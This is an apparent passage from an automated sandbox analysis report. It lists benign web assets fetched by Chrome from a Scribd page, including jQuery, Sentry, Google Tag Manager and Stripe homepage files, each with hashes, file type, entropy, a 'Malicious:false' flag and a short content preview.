                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:11A709242F47B8CC451EE68FDDECC072BB95D811FAA46BCBC9EBAEFD75BE2309A042FA838679659A739F49D48B546CAAA95F67D223C85387C57BA74CAC89A8B7
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg width="225px" height="50px" viewBox="0 0 225 50" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. Generator: Sketch 43.2 (39069) - http://www.bohemiancoding.com/sketch -->. <title>scribd_logo_horiz_small_white</title>. <desc>Created with Sketch.</desc>. <defs></defs>. <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="scribd_logo_horiz_small_white" fill="#57617A">. <path d="M66.9903315,18.2483295 C66.9903315,15.8615892 69.1533149,13.9969483 72.5469613,13.9969483 C75.2320442,13.9969483 77.6560773,14.8546831 80.0801105,16.8312025 L81.7955801,14.5563406 C79.1477901,12.43065 76.4254144,11.3491583 72.621547,11.3491583 C67.6616022,11.3491583 64.0441989,14.3325837 64.0441989,18.5093793 C64.0441989,22.8353461 66.8038674,24.7745726 72.808011,26.0798213 C78.2900552,27.2358986 79.5953039,28.6157329 79.5953039,31.0770588
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 43900
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):12220
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.984131147153584
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:26MV2PEUWRRI2V6SKbQ5W3YmOCf3OrXT9WVtzcrExwSeSZR4W870E8WqytwpvaJS:+tjRIm6SoITu3khUSyWW870EYyqpC3gf
                                                                                                                                                                                                                                                                                                                                                                                        MD5:1A001F3A066BFF47A766099B87253911
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8D12FD5ADAE663DFE3313A9043507B1CC16D05D3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C7B10F3B560AC311560E25F7D3867C8C60D19DEF8E3135D679DBF059209D5B86
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:6FE356145DE353396FF473453BE526A3F902CC45CA9E99BA6530134CA4D1695614D96402FBB0DE099E16E1F9B422CA6AAF1F11164BE17758ECFA799318C5004E
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:...........;ks.....n..i....k\....<.L..J..P"$F.q....{.%....;;.6.B.}N.w.>.....I.0(E*F.J..t$T=4......yc....J...T.4..%......."\..F......d..%...U52..c+>F..f..JV...... ......."tW>..[.x....L.Q.P.u't..\]wF..w=.._.z....Boi...'.c.FIl<m6M..]u.;..K....F..'.Y.R........AK.M..3.c.N.....D....yf..&...Y2oz......uS..Q.j.]&$...8[.i..6cT..L5.....#..Q.&hj;I.=6I.L.^,F..v;z\&...S4.....N.h...|.].@..D..B.=a..pz.P.....e.5...vQ....G~.fK...2..A.r9ko...ihO...R...[-...}.=.T.39O!.3"....(.....C.....q...8.E..6..*.}..]t.D...'gN.;.2.>....k.+.S)D.....0...".Q.i.,./r.(....Nn.Tmhz.m.Kx]Zj....y.<...;.D.r..H...U....@%.Kb...W.V.{..`i......._...'.!)5.CGd.....e.+^...E.8.Q..d.....4.#...|_.7.UCm..I{.{.f['...`..c:mBjMp......N..F..1.>*. YR...N....~te.B.}n....M..q.<...x.....N:.6.....CT..+^.1........!;...8....P..d+>.q",3..qW.....qb....:....C@ey.$..c.D.e..D...-..<...!......$.d...I`sj.;yplf.....<Y.2I.y.L.Du1".K..... gWn.4.2.....l..0ri....I...Q......X.x.}.?.......A.I..).g.a4.....o..-c
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (561)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):640
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.325601890699457
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:+dLsLKicwGB3ILQ44D1YhGEUNRYFCZxkZERx1bHZDxkZERdR+bJQsIFmDFXJJ8Ev:iIe/vB/DShTUNGFCZ6GHZD6UAJQRIXJ5
                                                                                                                                                                                                                                                                                                                                                                                        MD5:465B7AD8870CE8E31F155CB4B1B04425
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:35DE901404A539444C954CF83D23C1FFB2DDDED6
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:3E096DC7634B4DBEFAAB89398D0FFFD11F9A991CC4D408DCBAC5A660C601291C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:3F0D139C7067F5DE27CB0EC03C6264D213AA6F790193E5AB5DB87E987F7B8C8F4337AA8B906443C4EF37A0835168658D4866A27E102A97DEFC5B2C4F37342012
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/doc_page/196.c6862c.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[196],{29196:(r,s,a)=>{a.r(s),a.d(s,{default:()=>u});var e=a(38544),i=a(96540),t=a(37594);function o(r){return i.createElement(t.uV,r)}o.defaultProps={showSurvicate:!1,trialDuration:30};var l=a(78458);const u=(0,e.Ng)((r=>({progressiveProfileModalDismissPath:r.static.routes.progressiveProfileModalDismissPath,subscribeUrl:r.static.routes.subscribeUrl,trialDuration:r.personalization.trialDuration})),((r,s)=>({docPageCloseModal:()=>r((0,l.JY)(s.id))})))(o)}}]);.//# sourceMappingURL=https://www.scribd.com/webpack/doc_page/196.c6862c.js.map
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (19863), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):19863
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.3447766218190145
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:s40C/Kax6IcZb9QI0rcOZ4yjR8rSxnMhNgyyi82Xo4uc:Vr6IcZqInOnRHMrPyG1
                                                                                                                                                                                                                                                                                                                                                                                        MD5:BC033C3A83E1880E480086BF11AC0B0A
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:35137329601CC7E9CECFFEA9B881C363D42799F5
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:AEBE8DF81EE2BA5BC51E3ABC322910EE5122A0AC06EDFBCF7A04E1659D17DC9C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:45CB92F652D6D14F65FE7CDA19389A6C5BE8BADD7EF0110EAD45D045EC20A6037D0C21C594FD193387C49E5150E8B8FC559CF6476AAFBF2B33324993667516CE
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s.yimg.com/wi/ytc.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:!function(e){var t={};function n(r){if(t[r])return t[r].exports;var i=t[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var i in e)n.d(r,i,function(t){return e[t]}.bind(null,i));return r},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=0)}([function(e,t,n){"use strict";function r(){if("undefined"==typeof TextEncoder){window.Tex
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (7783)
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2054396
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.179823135874841
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:hkNI4mfZZUiSvHaOWkhyJ8FoyJJZJXjyJ8dIyJP9x3qKskVA8lEgY2PwUgDf4Tc:eI49WkhyJ+oyJpyJKIyJfc
                                                                                                                                                                                                                                                                                                                                                                                        MD5:79A90B9B36DA28F5CD5913D1BC80A4F5
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:F95999091EE3130146DD2D9794B358F5935D9327
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7025CB1BA0464BFCEA3EE6B3BC564CE33336AE4C3A683210F3979B8854C0FE76
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:E8CF5C6C6ADE507263EE20E4473CE613534D4C31E0555FB983FBE5BD9E7ABD6C7FE2DA2F09BDB6A780A62AEB3E07F1658627B8707C1C5A9D3F386BED1EAA1612
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html. class="MktRoot". lang="en-US". data-js-controller="Page". data-page-id="Home". data-page-title="Stripe | Financial Infrastructure to Grow Your Revenue". data-loading.>. <head>. <script>window.__capturedErrors = [];.window.onerror = function (message, url, line, column, error) { __capturedErrors.push(error); };.window.onunhandledrejection = function(evt) { __capturedErrors.push(evt.reason); }.</script>.<meta. name="sentry-config". data-js-dsn="https://7cd38b0eb2b348b39a6002cc768f91c7@errors.stripe.com/376". data-js-release="ee4e7f557994789051b3a577f46bb3640a7cb02b". data-js-environment="production". data-js-project="mkt".>.. <meta name="experiment-treatments" content="acquisition_top_cta_change.control.ursula.d6894038-ff23-475b-bac3-6e4cce61b215.a,wpp_homepage_title_copy.control.ursula.01a52302-744b-481e-9f7c-38ac7553fc45.a,acquisition_jp_homepage_holdback.control.ursula.a898293a-fe63-4480-8f40-2dbd6bef8f95.a,acquisition_text_suserng_with_viewpor
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1223)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):19485
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.498123677217319
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:LC/TzpZmdYHPu1cnq9W3eVqIudA7ItW09ROE1WWkK1z0Ika7YyifuxNrx5FejxO9:LCbNZmd6Pu1ct3yqZDtWcUE1WWr1qaV3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:ACFAAF3B7DA03D515C434409A8CEDFE3
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4E2FE4950FCED5DF7A649497A093614E0A7D778F
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A192CC8B869A545B6910C7CB5C96612499A856C49585A67D1629CEC7EBB83DA0
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8F6D029D18C0AEFECC9F864A9DAA33E19D6F7B73E9CE6D4FABEEB7DABACE55764A7DE6771604B2E2CF59BCC5E3E12D076D508D9773EA14E6E1B2188F25184AE0
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/static/service_worker/4c30/sw.js?origin=https%3A%2F%2Fwww.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Preview:'use strict';var aa=function(a){function c(d){return a.next(d)}function b(d){return a.throw(d)}return new Promise(function(d,e){function f(g){g.done?d(g.value):Promise.resolve(g.value).then(c,b).then(f,e)}f(a.next())})},h=function(a){return aa(a())};/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self;var r,u;a:{for(var ba=["CLOSURE_FLAGS"],z=n,A=0;A<ba.length;A++)if(z=z[ba[A]],z==null){u=null;break a}u=z}var ca=u&&u[610401301];r=ca!=null?ca:!1;var D;const da=n.navigator;D=da?da.userAgentData||null:null;function F(a){return r?D?D.brands.some(({brand:c})=>c&&c.indexOf(a)!=-1):!1:!1}function G(a){var c;a:{const b=n.navigator;if(b){const d=b.userAgent;if(d){c=d;break a}}c=""}return c.indexOf(a)!=-1};function H(){return r?!!D&&D.brands.length>0:!1}function I(){return H()?F("Chromium"):(G("Chrome")||G("CriOS"))&&!(H()?0:G("Edge"))||G("Silk")};!G("Android")||I();I();G("Safari")&&(I()||(H()?0:G("Coast"))||(H()?0:G("Opera"))||(H()?0:G("Edge"))||(
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3670)
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3980
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.840929067842708
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:QgiItG8em+MC7r810FaZldUMivS/Tr9K9QRqR+XX6lNO:Qge8etMOY10FaZlpivS/Tr9rRqR+XX6W
                                                                                                                                                                                                                                                                                                                                                                                        MD5:28F8122B50A7F5D7E2D0131E34308301
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:7EFCAE9CC53132D77FFC2F6C908B9B497BA28832
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:8359240906A24087F886912CB5988F7A3AF76F1EAB2F21ACDA532EDBD7E93C84
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CBBA06D1D233B5BB8A04B40CAA1B7A74152E548E8FF64B1F1C6D7E6FB417F4F33DF9C0580406718BF61397BA43172C87C9466420ED35428780751EB610186C35
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:. if (!window.Scribd) Scribd = {};. Scribd.Brand = 'scribd';. Scribd.NwayTestsWithWeights = {"doc_page_pass_hashed_email_2024_q1":{"id":2717,"choices":{"6902":{"name":"control","weight":50},"6903":{"name":"test","weight":50}}},"doc_page_pmp_boosting_c":{"id":2868,"choices":{"7327":{"name":"control","weight":1},"7328":{"name":"pmp_top_2","weight":0},"7329":{"name":"pmp_alternate","weight":0},"7330":{"name":"fixed_pmp_boost_moderate","weight":0},"7331":{"name":"fixed_pmp_boost_above","weight":0},"7332":{"name":"signup_ranking","weight":0}}},"scribd_top_level_category_pages":{"id":3040,"choices":{"7941":{"name":"control","weight":1},"7942":{"name":"test","weight":0}}},"scribd_rebrand":{"id":3049,"choices":{"8001":{"name":"control","weight":1},"8002":{"name":"true","weight":0}}},"doc_page_adsense_vs_house_q4":{"id":3085,"choices":{"8115":{"name":"control","weight":1},"8116":{"name":"test","weight":1}}},"recs_semantic_embedding_c":{"id":2103,"choices":{"5171":{"name":"control
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (32065)
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):85578
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.366055229017455
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                                                                                                                                                                                                                                                                                                                                                        MD5:2F6B11A7E914718E0290410E85366FE9
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2697)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2776
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.233852640368639
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:iILRjzNHLre3JEHU22GeSnQUMOj3EjmHmyak9VnOFKL:HG2Hd3Quj3f92o
                                                                                                                                                                                                                                                                                                                                                                                        MD5:CD2D6A301D597CCDBDDC03D2ECA1D660
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C6C58A07BEB0782835BFB05B80DD854DE04487F4
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:56A5FD709263ECB3C16D1362E5AEE02532C0895A7B4D97CC44D01D052A3DAF78
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:147BB9581B3690C100B38821BC81AEF16345424C35677CDB09A71FAB949D824260DF0432107303EB2ECBA130D87932A76653B704DE56E2BC994459ED838911E0
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/doc_page/719.ee32f5.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[719],{16719:(e,t,a)=>{a.r(t),a.d(t,{default:()=>p});var r=a(38544),n=a(40880),s=a(96540),o=a(86272),l=a(51336);class i extends l.A{constructor(e){super(e),this.addWrapperClassNames("auto__doc_page_App_Page_modals_ShareQuote")}getModalContent(){const{image_url:e,title:t,annotation:a}=this.props,{text:r,page:l}=a,i=location.href,p=n.A.t("webpack.doc_page.src.App.Page.modals.ShareQuote.ShareQuote.page_page",{page:l}),d=`"${r}"\n\n${i}\n\n${p}`,c=n.A.t("webpack.doc_page.src.App.Page.modals.ShareQuote.ShareQuote.loved_this_quote_i_read_on")+`#ScribdShare.\n\n"${r}"\n\n${p}\n\n`;return s.createElement(s.Fragment,null,this.getModalTitleElement({title:n.A.t("webpack.doc_page.src.App.Page.modals.ShareQuote.ShareQuote.share_quote")}),s.createElement("div",{className:"quote"},s.createElement("p",null,`"${r}"`),s.createElement("p",null,s.createElement("a",{href:i},i)),s.createElement("p",null,p)),s.
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (55551)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):55680
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.203995243517671
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:Umnx/qB6uktwNUsQ34PWsthj1tdp+YpsZo+T5vXF8+8BcEcvXQdiIorZMYdwje2W:Uj04P7xmFtebJOYy7zAOVBYG
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C8685D60E0F44F53F4A24D3C2B3F3DF0
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:31108C0976B00B468EA1DE91922304FEBF805258
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:1DBF4A2619AD865A2BD677CA5F72B04141D33349241188E7815876C338414D70
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1635D984A85D73CCB11A1C4FC921F3AEFC2522BB096511DB6CD2C603EC5A9F6691BA12AEE5AE3FE6EF388E76930D01CB533EEA8296752682779D3556445F822D
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://browser.sentry-cdn.com/7.19.0/bundle.min.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/*! @sentry/browser 7.19.0 (1818483) | https://github.com/getsentry/sentry-javascript */.var Sentry=function(t){const n=Object.prototype.toString;function e(t){switch(n.call(t)){case"[object Error]":case"[object Exception]":case"[object DOMException]":return!0;default:return h(t,Error)}}function r(t,e){return n.call(t)===`[object ${e}]`}function i(t){return r(t,"ErrorEvent")}function s(t){return r(t,"DOMError")}function o(t){return r(t,"String")}function c(t){return null===t||"object"!=typeof t&&"function"!=typeof t}function u(t){return r(t,"Object")}function a(t){return"undefined"!=typeof Event&&h(t,Event)}function f(t){return Boolean(t&&t.then&&"function"==typeof t.then)}function h(t,n){try{return t instanceof n}catch(t){return!1}}function l(t){return t&&t.Math==Math?t:void 0}const d="object"==typeof globalThis&&l(globalThis)||"object"==typeof window&&l(window)||"object"==typeof self&&l(self)||"object"==typeof global&&l(global)||function(){return this}()||{};function p(){return d}fun
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (45884), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):45884
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.617380317240789
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:J7OAysHJyKqV/LgW8TmJVZhUoyy312yeFCQQU//:JaLVF4SJvhUHylUPQUX
                                                                                                                                                                                                                                                                                                                                                                                        MD5:F15AA1324323977DF8C0DCA924FED0DA
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:B776AB5B432D27848AC159398A952D4DA0388B6E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:541F4E64CDC8FAEC400BEA159EB99A353C3552858C988F41DA380A445E6EB9FD
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:925A5365877C065C276707579BCD0CF7C70944FF3D230D602D3F08A3612D56BFABBC058E6E31513637959E9A0E3643E939547FA4A47E945298977340B54013DD
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/*! @build 84a8c710 @date 2024-09-20T16:59:47.606Z @generated 2024-09-25T15:36:29.227054673Z */!function(){"use strict";var r={8714:function(n,t,r){var a=r(9814),f=r(9402),d=r(8956),l=r(426),s=r(5423),m=r(450).t,v=r(1537).i;n.exports=function(i,c){var n=new Date,t=f(i.o.z9),r=l(i.v),e=s(r,i.X.zg,n),u=d(r,e,i.h,i.v,i.X,n),o=a(t,u,r,e,i.X.ze,n);return u.g(e.$),function(n,t,r){if(!c[n])return r(v("unknown action"));r=m(r);try{c[n](r,i,o,t)}catch(e){r(v(e.message,{z10:e.name}))}}}},6145:function(n,t,r){var b=r(9340).C,h=r(9790),x=r(8714),y=r(1374),w=r(2132),g=r(7725),$=r(4664),C=r(7950).F,F=r(1537).v,k=r(7788),Z=r(8783),z=r(7062),R=r(450).k,Y=r(8546);n.exports=function(n,t,r,e){var i,t=R($.Z(C(Y)),t),c=g(w(n,t,b),{debug:!0}),u={R:!1},o={Y:u,X:t,o:n,v:c,N:Z(),h:y(c,u)},a=k(c),f=r,d=[];for(i in e)e.hasOwnProperty(i)&&(f[i]=e[i],d.push(i));for(var l=x(o,f),s=[],m=(c("app",h.G,{acid:n.acid,zn:"84a8c710",zo:+new Date,zp:1726851587606,ver:o.X.ver,zq:u}),!1),v=function(r,n){switch(r){case"enforce
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 149 x 198, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):8935
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.961516857886905
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:iOX0oHHNlNv1lZAyOrxehkJvVfN7ZsyXjs3A29PKJx4bL7J+q7:isnNlp1lZAahqF7ZsyXjkA29iL2JD7
                                                                                                                                                                                                                                                                                                                                                                                        MD5:D19960B4D1827189404CC31166802B90
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:7DB04AA73754E7FBFBB5739369297449C36D7C70
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B7873C7F89178270338296E95B79B242D2A106DA85862BCF98B3DDAA14DD0C64
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CC1EFEB5A008936ADF90C160AA0842EA6E58133211B3F144E5BF8FFA8A62AC6FF28D3B500CE2E29FCA99446A8BF7903CB6A06D91CFD23FE6CC5036F9627B389F
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............f2$....gAMA......a.....sRGB.........PLTE.N."....R.N..P...V$. ". .N......T . .N..T..N..N..R.<$..<.( ..L.:$.$..&..4".& 1"..P..J..J..6..T.e...:.* .B&.q0..!.$ .H..I..J..J..<., ..9..L..@..:..R.b-..<.S)..4.6"..D.n0..L.F&..N..F..R..P.W*...X.B..L..P..>..L..<.\,.`,..>..@..>.....g)...8.....>.....G..8.....H..B.Z+..A..V.?%.=$..W...x.....[.R.....@................T..4.H(.....F....4#..l1.._.j,.......F.w2.u1..D..`.k0.N(.j/....5......l....3.8$...a...z2..c#.........O(.i.." ..\...M..a.r:.<...U.....v....n2.v@J(......T..p.....s..i.D...d.{F....p5...^,..4...].......Q.6..._..........B......}.6.....N...t.......C.....y....lvuv|2...e.......i.8..|L......~~....^......X........zD.......Z.fdd....8......q........L...........L..F..>.....|..h............pnpmkl.....R..........{zz.~Oc,.F&.......R.zxzI=;|4.....L...).....IDATx..}LT...g..'3...<;< 0..%...PX}v.......P.c....iU.].B.nV&!d...L.icC..m.....&E.....iT...,...U6Kz.....dp....x.....s.=..7..Qt/.^R...X...Q.G.DA..O.
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
